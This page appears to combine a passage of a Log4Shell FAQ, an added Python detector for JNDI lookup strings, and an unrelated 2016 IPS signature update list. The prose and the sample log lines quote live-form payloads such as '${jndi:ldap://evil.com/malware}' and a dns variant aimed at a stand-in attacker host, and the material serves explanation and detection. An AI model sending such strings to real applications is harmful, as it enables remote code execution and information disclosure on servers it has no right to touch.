How does an exploit for Log4Shell work exactly? What do “jndi” and “ldap” mean?


JNDI is a Java feature which allows Java objects to be loaded and used by a Java program at runtime. One of the protocols JNDI supports for fetching such objects is LDAP, an open, vendor-neutral protocol for “accessing directory information”, which you can also use to speak to your friendly neighborhood installation of MS Active Directory. LDAP and its Data Interchange Format (LDIF) were created at the University of Michigan in 1992, and if you squint at them enough, they almost look like some sort of proto-NoSQL.


The log4j2 module’s homebrew “lookups” language supports retrieving objects via JNDI. The string ${ jndi:ldap://evil.com/malware} means: “please use JNDI to retrieve and run the Java class residing at evil.com/malware; you will receive the class in LDAP protocol response format”. It should be noted that while only the ${ jndi:ldap://...} attack variant has become a proper viral meme, there are milder variants of the attack, such as ${ jndi:dns://...}, which will make a crafted DNS request to a server of the attacker’s choice and can be used to cause unauthorized information disclosure.
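As an added example (not part of the original FAQ), here is a small Python detector that flags the lookup strings described above in log lines and tells the code-loading ldap variant apart from the milder dns variant; the severity ranking and the sample log lines are my own construction.

```python
import re
from typing import Optional

# Matches a log4j2 lookup of the form ${jndi:<scheme>:...} and captures the
# scheme (ldap, ldaps, rmi, dns, ...). Whitespace after "${" is tolerated
# because the FAQ above writes the pattern as "${ jndi:...}".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Severity by scheme (my own classification): schemes that load a remote
# class are critical; the dns variant only leaks information.
SEVERITY = {"ldap": "critical", "ldaps": "critical", "rmi": "critical", "dns": "high"}


def classify_line(line: str) -> Optional[dict]:
    """Return {'scheme', 'severity'} if the line carries a JNDI lookup, else None."""
    m = JNDI_LOOKUP.search(line)
    if not m:
        return None
    scheme = m.group(1).lower()
    return {"scheme": scheme, "severity": SEVERITY.get(scheme, "medium")}


def scan(lines):
    """Scan log lines; return a list of (line_no, scheme, severity) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify_line(line)
        if result:
            hits.append((n, result["scheme"], result["severity"]))
    return hits


# Constructed sample access-log lines (not real traffic); the lookup string
# arrives in the User-Agent field, which many applications log verbatim.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://evil.com/malware}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET /x HTTP/1.1" 404 "${ jndi:dns://evil.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04] "GET /y HTTP/1.1" 200 "${not:jndi}"',
]

if __name__ == "__main__":
    for line_no, scheme, severity in scan(SAMPLE_LOG):
        print(f"line {line_no}: jndi:{scheme} lookup ({severity})")
```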


As part of their response guide, the Swiss CERT produced a visualization of the attack which we find very elucidating, and is reproduced below.


How can I protect myself against Log4Shell?


First, we encourage you to browse the above-mentioned Swiss CERT response guide in its entirety, including the list of recommended actions. Second, you should appreciate that these many and varied countermeasures are all presented for a reason, and no single one of them is a silver bullet. To wit:


Each individual mitigation on the list has its holes and drawbacks, but jointly, these items constitute something like the Swiss cheese model of pandemic defense.


How and why did this happen? How do we make sure it doesn’t happen again?


The story goes more or less like this.


In March of 1999, 8 developers working on the Apache web server form the Apache Software Foundation (ASF), a nonprofit with the goal of supporting open source projects. Under the guidance of the ASF, the original log4j sees its alpha release about half a year later, and a stable release follows about a year after that, in early 2001. Development on the original log4j continues until 2005 or so; in 2006, a new project named “LogBack” appears, introducing itself as a “successor [..] which picks up where log4j 1.X left off” and offering various performance and quality-of-life improvements. In 2012, log4j experiences an unlikely renaissance, as several developers come together to create a rewrite of it which becomes the initial alpha version of log4j2. Two months later, log4j2 publishes a beta release; it is during this beta phase that one of the project’s early adopters creates a feature request for JNDI support as a very convenient feature, detailing several use cases for it and even offering an already-written patch containing an implementation. 5 days after the request is submitted, a project maintainer laconically approves the merge request: “Your patch was committed in revision 1504620. Please verify and close”.


8 years later, which is to say, last month, the Alibaba cloud security team discreetly reaches out to the ASF in order to disclose the existence of the log4shell vulnerability. Public disclosure follows a few weeks later in a tweet (that has since been deleted), including source code for a working exploit. All hell breaks loose and the xkcd comic below is posted to social media thirty thousand times. 


Patches are issued, JVMs are updated, incident response teams over the world contemplate a career of cabbage farming someplace quiet in Canada. One of the log4j2 project maintainers complains:

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. https://t.co/W2u6AcBUM8

— Volkan Yazıcı (@yazicivo) December 10, 2021

Response is overwhelmingly supportive. The occasional dissenter insists that there was no “need” to keep anything and “compatibility” is the root of all evil, or at least in this case, in hindsight, it was. Passers-by wonder if the ASF hasn’t been paying the maintainers of log4j2, what has it been doing exactly.


Natural human instinct is to blame someone, and maybe for good reason. A lot of problems in the world are in fact the fault of specific people being selfish or short-sighted, and can be solved by taking these people to task. Still, it’s worth remembering that a lot of other problems in the world are caused by impersonal forces that push around individuals like cogs in a machine, seemingly without regard for their theoretical free will. How many times in history has a developer, even a well-paid developer, approved a feature request like this, despite a tingling sense of unease that the feature seems too powerful and vaguely out of scope for the project? The first security professional, tasked with securing a cave some time in the stone age, probably complained about this on their first day. It seems to keep happening no matter how many times we point the blaming finger at people after the fact. No one is very excited to deal with angry users, colleagues, managers and have to explain to them “no, everyone, trust me, I prevented a catastrophe”.


The emergence of the OpenSSL Heartbleed vulnerability in 2014 kindled a keen interest in taking better care of starved and understaffed open source projects that are cornerstones of modern digital infrastructure, as visualized in the comic above. Surely, this even worse incident will have a similar effect. But maybe the most profound effect of this whole ordeal on the future will be its weight as a cautionary tale. Three weeks ago, the average developer faced with a demand to have software evaluate arbitrary expressions for an extra “convenient” feature would have been the helpless cog in the machine, pressured to comply, with no recourse but to issue vague theoretical warnings that this is not the Right Thing To Do. But from today on, that developer can and should respond: “No. Are you serious? Do you want to cause the next Log4Shell?”

Original article: https://research.checkpoint.com/2021/the-laconic-log4shell-faq/


Check Point IPS Security Update
August 22nd, 2016 - Package No. 634165624
IPS Team
 
Recommended Profile Updates  

ADDED PROTECTIONS
Fortinet Cookie Overflow Remote Code Execution (EGREGIOUSBLUNDER)  NEW!
Check Point Reference  CPAI-2016-0715
An overflow vulnerability exists in the authentication cookie handling of Fortinet firewalls.
This protection detects attempts to exploit this vulnerability.
 
Adobe Acrobat and Reader Security Bypass (APSB16-14; CVE-2016-1040)  NEW!
Industry Reference  CVE-2016-1040  | Check Point Reference  CPAI-2016-0694
A remote code execution vulnerability exists in Adobe Acrobat and Reader.
This protection detects attempts to exploit this vulnerability.
 
Apache Commons FileUpload Denial Of Service (CVE-2016-3092)  NEW!
Industry Reference  CVE-2016-3092  | Check Point Reference  CPAI-2016-0684
A denial of service vulnerability exists in Apache Commons FileUpload.
This protection detects attempts to exploit this vulnerability.
 
Centreon Web Useralias Remote Command Execution  NEW!
Check Point Reference  CPAI-2016-0688
A remote command execution vulnerability exists in the Centreon Web Interface.
This protection detects attempts to exploit this vulnerability.
 
Command Injection Over Telnet  NEW!
Check Point Reference  CPAI-2016-0698
Telnet is an internet protocol that provides access to remote computers using a virtual terminal.
This protection detects command injection attempts sent over Telnet sessions.
 
Drupal CODER Module Remote Code Execution  NEW!
Check Point Reference  CPAI-2016-0709
A code execution vulnerability exists in Drupal CODER Module.
This protection detects attempts to exploit this vulnerability.
 
Drupal RESTWS Remote Code Execution  NEW!
Check Point Reference  CPAI-2016-0651
A code execution vulnerability exists in Drupal RESTful Web Services (RESTWS) Module.
This protection detects attempts to exploit this vulnerability.
 
Generic DVR Default Credentials Login Attempt  NEW!
Check Point Reference  CPAI-2016-0689
An attacker may attempt to gain access to a DVR system by trying to log in with default passwords until the correct one is found.
This protection detects login attempts using default DVR credentials.
 
JexBoss Security Scanner  NEW!
Check Point Reference  CPAI-2016-0710
JexBoss is a vulnerability scanning tool.
This protection detects scanning activity generated by JexBoss.
 
Rockwell Automation MicroLogix Remote Code Execution (CVE-2016-5645)  NEW!
Industry Reference  CVE-2016-5645  | Check Point Reference  CPAI-2016-0714
A vulnerability exists in the SNMP functionality on Rockwell Automation PLC systems.
This protection detects attempts to exploit this vulnerability.
 
SUN-RPC Programs Lookup - ver 2  NEW!
Check Point Reference  CPAI-2016-0563
SUN-RPC exposes a program lookup interface that can be used to enumerate available RPC services.
This protection detects attempts to scan for SUN-RPC programs through that interface.
 
Schneider Electric GP-Pro EX ParseAPI Heap Buffer Overflow  NEW!
Check Point Reference  CPAI-2016-0513
A heap buffer overflow vulnerability exists in Schneider Electric GP-Pro EX.
This protection will detect and block attempts to exploit this vulnerability.
 
SolarWinds SRM Profiler RulesMetaData addNewRule SQL Injection  NEW!
Check Point Reference  CPAI-2016-0697
An SQL injection vulnerability exists in the SolarWinds Storage Manager Resource Monitor, Profiler Module.
This protection will detect and block attempts to exploit this vulnerability.
 
Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization (CVE-2016-3642)  NEW!
Industry Reference  CVE-2016-3642  | Check Point Reference  CPAI-2016-0695
An insecure deserialization vulnerability has been reported in Solarwinds Virtualization Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Cross Site Request Forgery (CVE-2016-3653)  NEW!
Industry Reference  CVE-2016-3653  | Check Point Reference  CPAI-2016-0702
A Cross Site Request Forgery vulnerability has been reported in the Symantec Endpoint Protection Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Cross-Site Scripting (CVE-2016-3652)  NEW!
Industry Reference  CVE-2016-3652  | Check Point Reference  CPAI-2016-0706
A cross-site-scripting vulnerability has been reported in the Symantec Endpoint Protection Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Open Redirect Report-Routing Component (CVE-2016-5304)  NEW!
Industry Reference  CVE-2016-5304  | Check Point Reference  CPAI-2016-0707
An open redirect vulnerability exists in a report-routing component of Symantec Endpoint Protection Manager (SEPM) 12.
This protection detects attempts to exploit this vulnerability.
 
WECON LeviStudio String Content Heap Buffer Overflow  NEW!
Check Point Reference  CPAI-2016-0705
A heap buffer overflow vulnerability exists in WECON LeviStudio, due to improper parsing of the XML String Content attribute of LeviStudio project files.
This protection will detect and block attempts to exploit this vulnerability.
 
WordPress All In One WP Security and Firewall Plugin Login CAPTCHA Bypass  NEW!
Check Point Reference  CPAI-2016-0687
The login CAPTCHA provided by the WordPress All In One WP Security and Firewall Plugin can be circumvented, allowing attackers to automate login attempts when the CAPTCHA is enabled.
This protection detects attempts to exploit this vulnerability.
 
WordPress Core Authenticated Cross-Site Scripting (CVE-2016-1564)  NEW!
Industry Reference  CVE-2016-1564  | Check Point Reference  CPAI-2016-0650
A cross-site scripting vulnerability exists in WordPress core.
This protection detects attempts to exploit this vulnerability.
 
WordPress Ninja Forms Plugin SQL Injection  NEW!
Check Point Reference  CPAI-2016-0711
An SQL injection vulnerability exists in the WordPress Ninja Forms Plugin.
This protection detects attempts to exploit this vulnerability.
 
Microsoft LDAP Remote Anonymous Denial of Service (MS13-079; CVE-2013-3868)
Industry Reference  CVE-2013-3868  | Check Point Reference  CPAI-2013-2912
A denial of service vulnerability exists in implementations of Active Directory that could cause the service to stop responding.
This protection will detect and block a brute force attempt on Microsoft LDAP server.
 
UPDATED PROTECTIONS
CPAI-2011-109 IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow (CVE-2011-1213)
SBP-2009-15 Invalid IIS ASP.Net URI Character Request (CVE-2009-1536)
CPAI-2016-0670 Microsoft Edge Use After Free (MS16-095; CVE-2016-3326)
CPAI-2016-0679 Microsoft Graphics Component Memory Corruption (MS16-099; CVE-2016-3318)
CPAI-2012-129 Microsoft MSCOMCTL.OCX ActiveX Control Remote Code Execution (MS12-027; CVE-2012-0158)
CPAI-2016-0427 Microsoft Office Information Disclosure (MS16-070; CVE-2016-3234)
CPAI-2006-105 Microsoft Office RTF Malicious Known Variables
CPAI-2010-309 Microsoft Office RTF Stack Buffer Overflow (MS10-087; CVE-2010-3333)
CPAI-2016-0077 Microsoft Windows DLL Loading Remote Code Execution (MS16-014; CVE-2016-0041)
CPAI-2016-0303 Microsoft Windows Graphics Component Information Disclosure (MS16-055; CVE-2016-0168)
CPAI-2016-0153 Microsoft Windows PDF Library Remote Code Execution (MS16-028; CVE-2016-0117)
SBP-2011-05 Multiple SSH Initial Connection Requests
CPAI-2013-007 Oracle Java JmxMBeanServer Package Sandbox Breach (CVE-2013-0422)
CPAI-2016-0515 PayPal Mail Phishing Containing Attachment
CPAI-2007-127 Sun Java Web Start dnsResolve ActiveX Buffer Overflow (CVE-2007-5019)
CPAI-2014-2206 Web Servers Suspicious File Upload
 
 
Other Updates  
 
NEW PROTECTIONS
Weak Password Login Attempt Over Telnet
Check Point Reference  CPAI-2016-0704
Telnet is an internet protocol that provides access to remote computers using a virtual terminal.
This protection detects attempts to login to telnet service with a weak password.
 
 
UPDATED PROTECTIONS
SBP-2011-03 Brute Force Scanning of CIFS Ports
SBP-2010-17 Microsoft Windows ISATAP IPv6 Source Address Spoofing (CVE-2010-0812)
CPAI-2012-809 SCADA ICONICS WebHMI ActiveX Stack Overflow (CVE-2011-2089)
CPAI-2014-1191 Web Servers Slow HTTP Denial of Service
 